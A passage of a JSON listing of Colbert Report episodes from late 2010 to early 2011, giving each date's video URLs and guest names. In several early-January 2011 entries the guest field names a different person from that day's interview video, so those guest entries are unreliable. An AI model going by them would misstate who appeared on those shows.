      "guest": "Katrina vanden Heuvel, David Frum"
    },
    {
      "date": "2010-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/npkdbl/intro---11-3-10",
        "http://thecolbertreport.cc.com/videos/dnol9b/we-hardly-better-knew-ye",
        "http://thecolbertreport.cc.com/videos/tsa7r8/stephen-colbert-gives-you-props",
        "http://thecolbertreport.cc.com/videos/g1n60y/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/0ciqy7/sign-off---smiley-face-balloon"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2010-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ze4pgk/intro---11-4-10",
        "http://thecolbertreport.cc.com/videos/jssup2/spider-man-is-alaska-s-write-in-candidate",
        "http://thecolbertreport.cc.com/videos/59l5bf/tip-wag---tsa--bert---dogs",
        "http://thecolbertreport.cc.com/videos/px319n/elvis-costello"
      ],
      "guest": "Elvis Costello"
    },
    {
      "date": "2010-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bf24qu/one-hour-in-the-future",
        "http://thecolbertreport.cc.com/videos/odml1w/the-word---nothingness",
        "http://thecolbertreport.cc.com/videos/450kbl/president-obama-s-expensive-trip-to-india",
        "http://thecolbertreport.cc.com/videos/itfuo6/reza-aslan",
        "http://thecolbertreport.cc.com/videos/flh0gj/sign-off---battleship"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2010-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ndicnt/decision-points",
        "http://thecolbertreport.cc.com/videos/t6dluv/house-oversight-committee-hearings---abbe-lowell",
        "http://thecolbertreport.cc.com/videos/2tsnui/craziest-f--king-thing-i-ve-ever-heard---crab-vending-machines",
        "http://thecolbertreport.cc.com/videos/thu56b/cee-lo-green"
      ],
      "guest": "Cee-Lo Green"
    },
    {
      "date": "2010-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r8nn6k/michelle-obama-s-embarrassing-handshake",
        "http://thecolbertreport.cc.com/videos/h0bv7g/america-s-job-loss---beri-fox",
        "http://thecolbertreport.cc.com/videos/qra7vl/statue-of-jesus",
        "http://thecolbertreport.cc.com/videos/0cxark/martha-stewart",
        "http://thecolbertreport.cc.com/videos/gd9t0s/sign-off---saltine-hors-d-oeuvres"
      ],
      "guest": "Martha Stewart"
    },
    {
      "date": "2010-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vavqn0/colbert-platinum---kanye-west---million-dollar-advent-calendar-segment",
        "http://thecolbertreport.cc.com/videos/6py8bn/intro---11-11-10",
        "http://thecolbertreport.cc.com/videos/6obewf/stephen-absorbs-gene-shalit-s-opinions",
        "http://thecolbertreport.cc.com/videos/pigos8/colbert-platinum---kanye-west---million-dollar-advent-calendar",
        "http://thecolbertreport.cc.com/videos/8zchd5/stephen-trademarks-dated-catchphrases",
        "http://thecolbertreport.cc.com/videos/opi39p/quincy-jones",
        "http://thecolbertreport.cc.com/videos/dlv5sb/sign-off---if-it-walks-like-a-duck"
      ],
      "guest": "Quincy Jones"
    },
    {
      "date": "2010-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zwpnzb/finding-mr--goodwrench",
        "http://thecolbertreport.cc.com/videos/dzeed3/tsa-full-body-scanners---jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/yi115x/garfield-and-president-obama-s-veterans-day-controversies",
        "http://thecolbertreport.cc.com/videos/zgerlg/david-stern",
        "http://thecolbertreport.cc.com/videos/f5nt0v/sign-off---garfield-loves-veterans"
      ],
      "guest": "David Stern"
    },
    {
      "date": "2010-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6jx8i/intro---11-16-10",
        "http://thecolbertreport.cc.com/videos/r1nlt4/prince-william-proposes-to-kate-middleton",
        "http://thecolbertreport.cc.com/videos/6x0tmp/thought-for-food---c-zurrrre--medal-of-hunger-winner---cheesercize",
        "http://thecolbertreport.cc.com/videos/5n8eoi/stephen-colbert-s-report",
        "http://thecolbertreport.cc.com/videos/brwtip/john-legend"
      ],
      "guest": "John Legend"
    },
    {
      "date": "2010-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13lnab/intro---11-17-10",
        "http://thecolbertreport.cc.com/videos/bzhpi2/charlie-rangel--you-got-mailed",
        "http://thecolbertreport.cc.com/videos/izlih7/old-people-in-space",
        "http://thecolbertreport.cc.com/videos/rhup4k/chair-apparent",
        "http://thecolbertreport.cc.com/videos/x10udl/ian-frazier",
        "http://thecolbertreport.cc.com/videos/iu8jdu/synchronize-watches-to-colbert-time"
      ],
      "guest": "Ian Frazier"
    },
    {
      "date": "2010-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rip59b/stephen-pardons-joseph-gobbles",
        "http://thecolbertreport.cc.com/videos/6dqu0c/tip-wag---pope-benedict-xvi--trick-play---joseph-gobbles",
        "http://thecolbertreport.cc.com/videos/fbks4j/joseph-gobbles-shoots-jay-the-intern",
        "http://thecolbertreport.cc.com/videos/9ldbp0/salvatore-giunta",
        "http://thecolbertreport.cc.com/videos/92wwov/sign-off---happy-thanksgiving"
      ],
      "guest": "Staff Sgt. Salvatore Giunta"
    },
    {
      "date": "2010-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fyh8jk/intro---11-29-10",
        "http://thecolbertreport.cc.com/videos/5liwl3/black-friday-interpretation",
        "http://thecolbertreport.cc.com/videos/qhebrf/better-business-hero",
        "http://thecolbertreport.cc.com/videos/1fhpey/dan-savage",
        "http://thecolbertreport.cc.com/videos/nilxac/sign-off---goodnight"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2010-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0th7i0/god-drops-steve-johnson-s-football-pass",
        "http://thecolbertreport.cc.com/videos/rd3bzl/wikileaks-document-dump---james-rubin",
        "http://thecolbertreport.cc.com/videos/t2kayc/soap-opera-product-placement",
        "http://thecolbertreport.cc.com/videos/5qjkay/tom-vilsack",
        "http://thecolbertreport.cc.com/videos/ovt98b/sign-off---chex-mix-product-placement"
      ],
      "guest": "Tom Vilsack"
    },
    {
      "date": "2010-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373wri/return-of-the-estate-tax",
        "http://thecolbertreport.cc.com/videos/hml13u/lame-duck-congress---jake-tapper",
        "http://thecolbertreport.cc.com/videos/df8z4y/cheating-death---calming-meat-goggles---the-ithrone",
        "http://thecolbertreport.cc.com/videos/hbifbv/michelle-rhee",
        "http://thecolbertreport.cc.com/videos/5oq9dq/sign-off---up-on-the-lingo"
      ],
      "guest": "Michelle Rhee"
    },
    {
      "date": "2010-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d067b7/intro---12-2-10",
        "http://thecolbertreport.cc.com/videos/y4fa8v/john-thune-looks-presidential",
        "http://thecolbertreport.cc.com/videos/vaqkqk/the-word---the-great-white-wail",
        "http://thecolbertreport.cc.com/videos/efh5u1/the-blitzkrieg-on-grinchitude---atheist-billboard---capitol-christmas-tree",
        "http://thecolbertreport.cc.com/videos/trmu6j/david-stockman",
        "http://thecolbertreport.cc.com/videos/v9n94y/sign-off---chinese-finger-trap"
      ],
      "guest": "David Stockman"
    },
    {
      "date": "2010-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/exzvsm/cosmo-is-available-in-mongolia",
        "http://thecolbertreport.cc.com/videos/bwubcy/the-word---unrequited-gov",
        "http://thecolbertreport.cc.com/videos/eoidl7/mysteries-of-the-ancient-unknown---the-pursuit-of-the-pharaoh-s-phallus-pt--1",
        "http://thecolbertreport.cc.com/videos/wdodc8/garry-trudeau",
        "http://thecolbertreport.cc.com/videos/gktluk/sign-off---goodnight"
      ],
      "guest": "Garry Trudeau"
    },
    {
      "date": "2010-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ishllr/extension-of-the-bush-tax-cuts",
        "http://thecolbertreport.cc.com/videos/n0u86v/mysteries-of-the-ancient-unknown---the-pursuit-of-the-pharaoh-s-phallus-pt--2",
        "http://thecolbertreport.cc.com/videos/ya6qw9/poll-to-repeal-don-t-ask--don-t-tell",
        "http://thecolbertreport.cc.com/videos/gf8r28/david-eisenhower---julie-nixon-eisenhower",
        "http://thecolbertreport.cc.com/videos/99syt9/sign-off---goodnight"
      ],
      "guest": "Julie Nixon Eisenhower &amp; David Eisenhower"
    },
    {
      "date": "2010-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f6likw/exclusive---steve-martin-extended-segment",
        "http://thecolbertreport.cc.com/videos/kml8x8/tip-wag---art-edition---brent-glass",
        "http://thecolbertreport.cc.com/videos/2akwcg/steve-martin-pt--1",
        "http://thecolbertreport.cc.com/videos/yqcbtk/steve-martin-pt--2",
        "http://thecolbertreport.cc.com/videos/ct0ud7/sign-off---steve-martin-mask"
      ],
      "guest": "Steve Martin"
    },
    {
      "date": "2010-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/znivka/israel-shark-conspiracy",
        "http://thecolbertreport.cc.com/videos/fi19uy/international-manhunt-for-julian-assange---daniel-ellsberg",
        "http://thecolbertreport.cc.com/videos/fk2pnu/art-stephen-up-challenge---william-wegman",
        "http://thecolbertreport.cc.com/videos/1akto9/julie-taymor",
        "http://thecolbertreport.cc.com/videos/hcd55s/sign-off---christmas-party"
      ],
      "guest": "Julie Taymor"
    },
    {
      "date": "2010-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f2kl6o/intro---12-13-10",
        "http://thecolbertreport.cc.com/videos/eolk50/found-goldman-sachs-mastercard",
        "http://thecolbertreport.cc.com/videos/c1yv8b/the-word---swift-payment",
        "http://thecolbertreport.cc.com/videos/btsd4o/blitzkrieg-on-grinchitude---gretchen-carlson---christian-nation-christ-mas-tree",
        "http://thecolbertreport.cc.com/videos/rufuhr/patti-smith",
        "http://thecolbertreport.cc.com/videos/t0590z/sign-off---remembering-richard-holbrooke"
      ],
      "guest": "Patti Smith"
    },
    {
      "date": "2010-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ycermm/goldman-sachs-lawyers-want-buckley-t--ratchford-s-card-back",
        "http://thecolbertreport.cc.com/videos/rsdutw/prop-8-challenge---david-boies",
        "http://thecolbertreport.cc.com/videos/4tx5ks/stephen-wins-twitter---biz-stone",
        "http://thecolbertreport.cc.com/videos/ouqrnm/stephen-sondheim",
        "http://thecolbertreport.cc.com/videos/ajg2h0/sign-off---closing-credits"
      ],
      "guest": "David Boies, Stephen Sondheim"
    },
    {
      "date": "2010-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9gi4ae/intro---12-15-10",
        "http://thecolbertreport.cc.com/videos/67nfxh/scanner-defying-pancakes",
        "http://thecolbertreport.cc.com/videos/fv3gl9/world-war-3-0---omar-wasow",
        "http://thecolbertreport.cc.com/videos/rr8wvk/tiny-triumphs---lethal-drug-shortage",
        "http://thecolbertreport.cc.com/videos/e05lny/laird-hamilton",
        "http://thecolbertreport.cc.com/videos/nv267b/sign-off---winter-fashion-tip"
      ],
      "guest": "Omar Wasow, Laird Hamilton"
    },
    {
      "date": "2010-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cb861t/christmas-holy-week",
        "http://thecolbertreport.cc.com/videos/m38gcf/jesus-is-a-liberal-democrat",
        "http://thecolbertreport.cc.com/videos/tvxon5/amy-sedaris",
        "http://thecolbertreport.cc.com/videos/zejxdk/paul-simon"
      ],
      "guest": "Amy Sedaris, Paul Simon"
    }
  ],
  "2011": [
    {
      "date": "2011-01-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a5rzlq/intro---1-3-11",
        "http://thecolbertreport.cc.com/videos/pgayak/snowpocalypse-2010",
        "http://thecolbertreport.cc.com/videos/7b084t/tip-wag---susan-g--komen-foundation---spider-man-musical",
        "http://thecolbertreport.cc.com/videos/44ybv8/the-enemy-within---caboodle-ranch",
        "http://thecolbertreport.cc.com/videos/vopb2f/ed-rendell",
        "http://thecolbertreport.cc.com/videos/bvg4tu/sign-off---home-improvement-tip"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2011-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/40y983/intro---1-4-11",
        "http://thecolbertreport.cc.com/videos/tq4xo3/native-american-overlords",
        "http://thecolbertreport.cc.com/videos/kafccc/gold-faithful",
        "http://thecolbertreport.cc.com/videos/0ds0c9/gold-faithful---ron-paul---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/leatvt/geoffrey-canada",
        "http://thecolbertreport.cc.com/videos/h983ts/sign-off---12-dutchmen-answer"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2011-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/upvgg0/intro---1-5-11",
        "http://thecolbertreport.cc.com/videos/ttqn4k/huckleberry-finn-censorship",
        "http://thecolbertreport.cc.com/videos/4c01zx/what-s-a-reince-priebus-",
        "http://thecolbertreport.cc.com/videos/d2586v/yellowline-international--inc-",
        "http://thecolbertreport.cc.com/videos/1yfs5a/atul-gawande",
        "http://thecolbertreport.cc.com/videos/ta25ww/sign-off---dark-side-of-the-moon"
      ],
      "guest": "Steve Case"
    },
    {
      "date": "2011-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gfffz6/shout-out-to-arby-s",
        "http://thecolbertreport.cc.com/videos/g7dtso/john-boehner-s-large-gavel",
        "http://thecolbertreport.cc.com/videos/t27er5/cheating-death---placebo-effect--immortality---wild-lynx",
        "http://thecolbertreport.cc.com/videos/n6wqjn/bill-o-reilly-proves-god-s-existence---neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/i48v1q/ronald-depinho",
        "http://thecolbertreport.cc.com/videos/x8bqqt/sign-off---boris-the-lynx"
      ],
      "guest": "Dr. Ronald DePinho"
    },
    {
      "date": "2011-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qi5a0o/intro---1-10-11",
        "http://thecolbertreport.cc.com/videos/xl3r2n/pundits-lay-blame-for-senseless-arizona-attack",
        "http://thecolbertreport.cc.com/videos/6s01yh/bull-sessions",
        "http://thecolbertreport.cc.com/videos/cng4n9/difference-makers---galactic-edition-pt--1",
        "http://thecolbertreport.cc.com/videos/oelxfx/difference-makers---galactic-edition-pt--2",
        "http://thecolbertreport.cc.com/videos/gk32r8/fen-montaigne",
        "http://thecolbertreport.cc.com/videos/oslcyl/sign-off---goodnight"
      ],
      "guest": "Fen Montaigne"
    },
    {
      "date": "2011-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/97pzie/intro---1-11-11",
        "http://thecolbertreport.cc.com/videos/q63emf/snowstorm-preparation",
        "http://thecolbertreport.cc.com/videos/rbg8gh/metunes---grammy-vote---dan-auerbach--patrick-carney---ezra-koenig",
        "http://thecolbertreport.cc.com/videos/oqami3/lithuania-perfume",
        "http://thecolbertreport.cc.com/videos/mqh8rb/chris-hughes",
        "http://thecolbertreport.cc.com/videos/8re8oa/sign-off---pringles"
      ],
      "guest": "Chris Hughes"
    },
    {
      "date": "2011-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1aza8n/50-cent-makes-money-on-twitter",
        "http://thecolbertreport.cc.com/videos/b4mxvn/the-word---life--liberty-and-the-pursuit-of-angriness",
        "http://thecolbertreport.cc.com/videos/56kjjw/bernard-henri-levy-pt--1",
        "http://thecolbertreport.cc.com/videos/cmxyxs/bernard-henri-levy-pt--2",
        "http://thecolbertreport.cc.com/videos/splrfl/sign-off---goodnight"
      ],
      "guest": "Bernard-Henri Levy"
    },
    {
      "date": "2011-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5qwzv/hitler-s-inspiring-tucson-memorial-speech",
        "http://thecolbertreport.cc.com/videos/nhx7bu/thought-for-food---fruit-pouch--doritos-ad---super-big-gulp",
        "http://thecolbertreport.cc.com/videos/wdqdqn/israeli-vulture-spy",
        "http://thecolbertreport.cc.com/videos/xczq8w/kevin-spacey",
        "http://thecolbertreport.cc.com/videos/iyyhr8/sign-off---new-york-post"
      ],
      "guest": "Kevin Spacey"
    },
    {
      "date": "2011-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iuhos5/intro---1-17-11",
        "http://thecolbertreport.cc.com/videos/ztaz7m/martin-luther-king-jr--day-sales",
        "http://thecolbertreport.cc.com/videos/9ycstf/the-word---run-for-your-life",
        "http://thecolbertreport.cc.com/videos/ib4cpu/art-stephen-up-challenge---wade-hampton",
        "http://thecolbertreport.cc.com/videos/kd5rmr/sherry-turkle",
        "http://thecolbertreport.cc.com/videos/tj76rr/sign-off---new-york-post"
      ],
      "guest": "Sherry Turkle"
    },
    {
      "date": "2011-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fi5nk7/intro---1-18-11",
        "http://thecolbertreport.cc.com/videos/y6lk8z/mika-brzezinski-experiences-palin-fatigue",
        "http://thecolbertreport.cc.com/videos/1zj4bl/the-word---disintegration",
        "http://thecolbertreport.cc.com/videos/l4vdiw/coma-cozy",
        "http://thecolbertreport.cc.com/videos/zeukt7/cornel-west",
        "http://thecolbertreport.cc.com/videos/njlf77/sign-off---coma-cozy"
      ],
      "guest": "Cornel West"
    },
    {
      "date": "2011-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4e1xmn/intro---1-19-11",
        "http://thecolbertreport.cc.com/videos/0s8rfq/black-tie-dinner-for-hu-jintao",
        "http://thecolbertreport.cc.com/videos/nujiex/tip-wag---four-loko---horoscopes",
        "http://thecolbertreport.cc.com/videos/vb8d7c/shout-out---preston-pysh",
        "http://thecolbertreport.cc.com/videos/czmy3b/ron-reagan",
        "http://thecolbertreport.cc.com/videos/0ycmn7/sign-off---i-eat-america--and-so-can-you---recall"
      ],
      "guest": "Ron Reagan Jr."
    },
    {
      "date": "2011-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/091ydv/rush-limbaugh-speaks-chinese",
        "http://thecolbertreport.cc.com/videos/bq6mnl/state-budget-shortfalls---christine-todd-whitman",
        "http://thecolbertreport.cc.com/videos/c8u4qm/50th-anniversary-of-jfk-s-inaugural-address",
        "http://thecolbertreport.cc.com/videos/6pfgfg/chris-matthews",
        "http://thecolbertreport.cc.com/videos/jjup5d/sign-off---donald-pellview"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2011-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z2h5xs/intro---1-24-11",
        "http://thecolbertreport.cc.com/videos/ry0uh0/stephen-rejects-keith-olbermann-s-power",
        "http://thecolbertreport.cc.com/videos/e7bfej/the-word---coverage-of-denial",
        "http://thecolbertreport.cc.com/videos/mjnoqk/art-stephen-up-challenge---banksy",
        "http://thecolbertreport.cc.com/videos/rsyf0v/charlie-rose",
        "http://thecolbertreport.cc.com/videos/v0sh08/sign-off---keith-olbermug"
      ],
      "guest": "Charlie Rose"
    },
    {
      "date": "2011-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1mhey7/intro---1-25-11",
        "http://thecolbertreport.cc.com/videos/d21szi/the--battle-hymn-of-the-tiger-mother--controversy",
        "http://thecolbertreport.cc.com/videos/5198pt/threatdown---radical-muslim-snacks--flying-robot-drones---coked-up-vacuums",
        "http://thecolbertreport.cc.com/videos/ooebba/nazi-ometer",
        "http://thecolbertreport.cc.com/videos/2lr90o/amy-chua",
        "http://thecolbertreport.cc.com/videos/71c1bx/sign-off---stephen-welcomes-cody-price"
      ],
      "guest": "Amy Chua"
    },
    {
      "date": "2011-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99necf/anonymous-insider-author-speculation",
        "http://thecolbertreport.cc.com/videos/d2sy94/obama-s-state-of-the-union-address---michael-waldman",
        "http://thecolbertreport.cc.com/videos/za0351/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---curtis-oda",
        "http://thecolbertreport.cc.com/videos/wja66h/christine-yvette-lewis",
        "http://thecolbertreport.cc.com/videos/7znx6n/sign-off---man-handler---fork-phone"
      ],
      "guest": "Michael Waldman, Christine Yvette Lewis"
    },
    {
      "date": "2011-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fllqqg/intro---1-27-11",
        "http://thecolbertreport.cc.com/videos/959fok/candyquake",
        "http://thecolbertreport.cc.com/videos/bhf8jv/time-traveling-porn---daryl-bem",
        "http://thecolbertreport.cc.com/videos/uffqf8/gordita-supreme-court",
        "http://thecolbertreport.cc.com/videos/zgxlja/brian-greene",
        "http://thecolbertreport.cc.com/videos/nkbrns/sign-off---goodnight"
      ],
      "guest": "Dr. Daryl Bem, Brian Greene"
    },
    {
      "date": "2011-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2wwddt/intro---1-31-11",
        "http://thecolbertreport.cc.com/videos/uv1y3k/mubarak--mu-problems",
        "http://thecolbertreport.cc.com/videos/w70tw3/mubarak--mu-problems---samer-shehata",
        "http://thecolbertreport.cc.com/videos/35ink0/paul-offit",
        "http://thecolbertreport.cc.com/videos/ccilnn/sign-off---kim-jong-bear"
      ],
      "guest": "Samer Shehata, Dr. Paul Offit"
    },
    {
      "date": "2011-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wk9d57/hosni-mubarak-will-not-run-again",
        "http://thecolbertreport.cc.com/videos/ie8q6j/thought-for-food---nestle-corporation",
        "http://thecolbertreport.cc.com/videos/2ucxw7/thought-for-food---wyngz---wal-mart",
        "http://thecolbertreport.cc.com/videos/odeko3/wal-mart-collaborates-with-obama-administration---leslie-dach",
        "http://thecolbertreport.cc.com/videos/4shxg7/michael-lewis",
        "http://thecolbertreport.cc.com/videos/s7oggh/sign-off---digiorno-pizza---boneless-wyngz"
      ],
      "guest": "Leslie Dach, Michael Lewis"
    },
    {
      "date": "2011-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zdhdko/intro---2-2-11",
        "http://thecolbertreport.cc.com/videos/ct2jwf/bing-gets-served",
        "http://thecolbertreport.cc.com/videos/a4bw27/cairo-turns-into-the-jersey-shore",
        "http://thecolbertreport.cc.com/videos/q27618/crisis-in-egypt",
        "http://thecolbertreport.cc.com/videos/yjimo0/tip-wag---british-superman---big-flats-beer",
        "http://thecolbertreport.cc.com/videos/dme3nu/sean-dorrance-kelly",
        "http://thecolbertreport.cc.com/videos/n2upjg/sign-off---christiane-aman-purr---big-flats-beer"
      ],
      "guest": "Sean Kelly"
    },
    {
      "date": "2011-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nn8o94/intro---2-3-11",
        "http://thecolbertreport.cc.com/videos/lo20rh/crisis-in-egypt---anderson-cooper---bill-o-reilly",
        "http://thecolbertreport.cc.com/videos/vuogyk/sport-report---super-bowl-edition",
        "http://thecolbertreport.cc.com/videos/91t3tp/affirmative-reaction",
        "http://thecolbertreport.cc.com/videos/i5rwqs/jane-mcgonigal",
        "http://thecolbertreport.cc.com/videos/hffd6m/sign-off---newest-member-of-the-colbert-nation"
      ],
      "guest": "Jane McGonigal"
    },
    {
      "date": "2011-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kruhy0/intro---2-14-11",
        "http://thecolbertreport.cc.com/videos/4drnjr/mysteries-of-the-ancient-unknown---egyptian-coincidence",
        "http://thecolbertreport.cc.com/videos/gv0hvh/the-enemy-within---toddler-edition",
        "http://thecolbertreport.cc.com/videos/qtecuk/james-murphy-of-lcd-soundsystem",
        "http://thecolbertreport.cc.com/videos/4qawhf/sign-off---scoops-of-americone-dream"
      ],
      "guest": "LCD Soundsystem"
    },
    {
      "date": "2011-02-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ynf8rd/intro---2-15-11",
        "http://thecolbertreport.cc.com/videos/sjuyr9/italian-bunga-bunga-parties---egyptian-democracy",
        "http://thecolbertreport.cc.com/videos/ara6q6/egyptian-democracy---christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/n9a7wj/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---ron-gould",
        "http://thecolbertreport.cc.com/videos/uobmig/david-albright",
        "http://thecolbertreport.cc.com/videos/95itm9/sign-off---christiane-aman-purr-s-safari-suit"
      ],
      "guest": "Christiane Amanpour, David Albright"
    },
    {
      "date": "2011-02-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbqm6g/intro---2-16-11",
        "http://thecolbertreport.cc.com/videos/bojft9/republican-voters-doubt-obama-s-american-citizenship",
        "http://thecolbertreport.cc.com/videos/uk8a3q/tip-wag---colbuffington-re-post--repo-games---whale-fail",
        "http://thecolbertreport.cc.com/videos/8r9j45/murdoch-he-wrote",
        "http://thecolbertreport.cc.com/videos/re8ih2/eric-foner",
        "http://thecolbertreport.cc.com/videos/i84xxd/sign-off---general-butterbean"
      ],
      "guest": "Eric Foner"
    },
    {
      "date": "2011-02-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62enfw/the-huffington-post-posts-about-the-colbuffington-re-post",
        "http://thecolbertreport.cc.com/videos/yjsn8n/clarence-thomas-s-financial-disclosure-controversy",
        "http://thecolbertreport.cc.com/videos/tvwda6/project-magazine-cover-boy",
        "http://thecolbertreport.cc.com/videos/sjlg3t/jeffrey-leonard",
        "http://thecolbertreport.cc.com/videos/m0qkxm/sign-off---project-magazine-cover"
      ],
      "guest": "Jeffrey Leonard"
    },
    {
      "date": "2011-02-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86hqgf/turmoil-in-the-middle-east---turmoil-in-the-middle-west",
        "http://thecolbertreport.cc.com/videos/lp0v0e/cheating-death---ablibalify---bing-bongavax",
        "http://thecolbertreport.cc.com/videos/fwkicl/rick-santorum-internet-search",
        "http://thecolbertreport.cc.com/videos/8du0y6/eugene-jarecki",
        "http://thecolbertreport.cc.com/videos/58iq33/sign-off---goodnight"
      ],
      "guest": "Eugene Jarecki"
    },
    {
      "date": "2011-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bqnw4a/intro---2-22-11",
        "http://thecolbertreport.cc.com/videos/bm2a1j/a-less-perfect-union",
        "http://thecolbertreport.cc.com/videos/usnwve/a-less-perfect-union---randi-weingarten",
        "http://thecolbertreport.cc.com/videos/f6avpd/wisco-inferno---jon-erpenbach",
        "http://thecolbertreport.cc.com/videos/p92sec/bing-west",
        "http://thecolbertreport.cc.com/videos/2kp9tj/sign-off---democrat-call"
      ],
      "guest": "Randi Weingarten, Bing West"
    },
    {
      "date": "2011-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pd1kio/intro---2-23-11",
        "http://thecolbertreport.cc.com/videos/883h13/usa-today-infographic-sells-out",
        "http://thecolbertreport.cc.com/videos/fn2n7y/bust-in-show",
        "http://thecolbertreport.cc.com/videos/tnaq8e/nailed--em---mark-burdett",
        "http://thecolbertreport.cc.com/videos/iap6wk/stephanie-coontz",
        "http://thecolbertreport.cc.com/videos/uyxtz0/sign-off---rebroadcasts"
      ],
      "guest": "Stephanie Coontz"
    },
    {
      "date": "2011-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7a9kp1/era-of-american-dental-exceptionalism-is-over",
        "http://thecolbertreport.cc.com/videos/xjtazd/corporate-hacker-tries-to-take-down-wikileaks",
        "http://thecolbertreport.cc.com/videos/8jruu4/corporate-hacker-tries-to-take-down-wikileaks---glenn-greenwald",
        "http://thecolbertreport.cc.com/videos/tyiacl/republicans-flirt-with-presidential-candidacy",
        "http://thecolbertreport.cc.com/videos/hxtqey/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/6ahql2/sign-off---elephant-beat"
      ],
      "guest": "Glenn Greenwald, Mike Huckabee"
    },
    {
      "date": "2011-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8jxxuv/intro---2-28-11",
        "http://thecolbertreport.cc.com/videos/8fpe6c/anonymous-hacks-the-colbert-report",
        "http://thecolbertreport.cc.com/videos/ohhby5/tip-wag---joe-reed---levi-s-ex-girlfriend-jeans",
        "http://thecolbertreport.cc.com/videos/lrah7j/art-stephen-up-challenge---phillips-de-pury-auction",
        "http://thecolbertreport.cc.com/videos/4oq5za/michael-scheuer",
        "http://thecolbertreport.cc.com/videos/qg45nm/sign-off---tomorrow-s-goodnight-preview"
      ],
      "guest": "Michael Scheuer"
    },
    {
      "date": "2011-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dbc523/intro---3-1-11",
        "http://thecolbertreport.cc.com/videos/hl74h7/muammar-al-gaddafi-competes-with-charlie-sheen",
        "http://thecolbertreport.cc.com/videos/ce6ez1/the-word---new-country-for-old-men",
        "http://thecolbertreport.cc.com/videos/6zdcls/senior-moment---geriatric-porn",
        "http://thecolbertreport.cc.com/videos/zxzpiz/evan-osnos",
        "http://thecolbertreport.cc.com/videos/b6gm2j/sign-off---welcome-zachary-paul-dahm"
      ],
      "guest": "Evan Osnos"
    },
    {
      "date": "2011-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/44fqvj/intro---3-2-11",
        "http://thecolbertreport.cc.com/videos/jh2tli/wisconsin-prank-call-bill",
        "http://thecolbertreport.cc.com/videos/i9x3xr/the-word---economic-boom",
        "http://thecolbertreport.cc.com/videos/uz0ktw/eulogy-spot",
        "http://thecolbertreport.cc.com/videos/7lrvtf/harry-connick-jr-",
        "http://thecolbertreport.cc.com/videos/ninj2e/sign-off---demise-of-the-white-pages"
      ],
      "guest": "Harry Connick Jr."
    },
    {
      "date": "2011-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nb3zpi/fox-news-suspends-contributors",
        "http://thecolbertreport.cc.com/videos/7vwzpc/ice-cream-fight-with-jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/4oi0dh/ice-cream-hallucination-with-jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/zxu7kb/mark-moffett",
